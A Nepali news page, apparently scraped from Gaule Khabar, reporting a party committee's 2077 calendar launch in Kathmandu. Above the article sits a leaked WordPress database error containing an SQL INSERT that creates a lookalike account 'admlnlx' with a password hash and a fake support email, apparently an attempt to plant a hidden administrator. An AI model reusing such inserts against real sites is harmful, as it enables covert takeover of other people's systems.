WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC/5KKwrzO5owsUeWk7VwxFytixghH/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 21:55:58', '', 'admlnlx', 'admlnlx')

नेकपा माप्य दुधकोशी-काठमाडौं सम्पर्क कमिटिद्वारा २०७७ सालको क्यालेन्डर सार्वजानिक – Gaule Khabar

नेकपा माप्य दुधकोशी-काठमाडौं सम्पर्क कमिटिद्वारा २०७७ सालको क्यालेन्डर सार्वजानिक

प्रमुख अतिथि प्रतिनिधिसभाका सांसद हेम कुमार राई ...

नेकपा माप्य दुधकोशी-काठमाडौं सम्पर्क कमिटिद्वारा २०७७ सालको क्यालेन्डर सार्वजानिक

जेठ २८, काठमाडौं –  नेपाल कम्युनिष्ट पार्टी (नेकपा) माप्य दुधकोशी काठमाडौं  सम्पर्क कमिटिले २०७७ सलको भित्तेपात्रो (क्यालेन्डर) बुधबार काठमाडौंमा सार्वजानिक गरेको छ ।

टुसालमा आयोजित लोकार्पण कार्यक्रमका प्रमुख अतिथि प्रतिनिधिसभाका सांसद हेम कुमार राई, अतिथि नेकपा सोलुखुम्बुका सचिव   गोम्बु शेर्पा (कर्ज्याङ), माप्य दुधकोशी १ का वडा अध्यक्ष अगम कुमार राई र माप्य दुधकोशी-काठमाडौं सम्पर्क कमिटिका अध्यक्ष   चन्द्र प्रसाद घिमिरेले क्यालेन्डर लोकर्पण गरेका थिए । कोरोना भाइरसको प्रकोपका कारण क्यालेन्डर प्रकाशनमा ढिलो भएको कमिटिका अध्यक्ष चन्द्र प्रसाद घिमिरेले बताएका छन् ।

यसै समारोहका बिच नेकपामा प्रवेश गरेका आङ्टु राईलाई खादा ओढाएर स्वागत गरिएको कमिटिका अध्यक्ष चन्द्र प्रसाद घिमिरेले जानकारी दिए ।

नव प्रवेशी आङ्टु राई (बायाँबाट दोस्रो खादा लगाएको)

कमिटिका अध्यक्ष घिमिरेको अध्यक्षतामा सप्पन्न  समारोहमा नेकपा सोलुखुम्बुका सदस्य अर्जुन राई, युवा संघका केन्द्रीय सदस्य हेमचन्द्र राई,युवा नेता भुपेन कट्टेल लगायत ५० जनाको उपस्थिति रहेको थियो ।

कार्यक्रमको अन्त्यमा फोटो सेसन

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका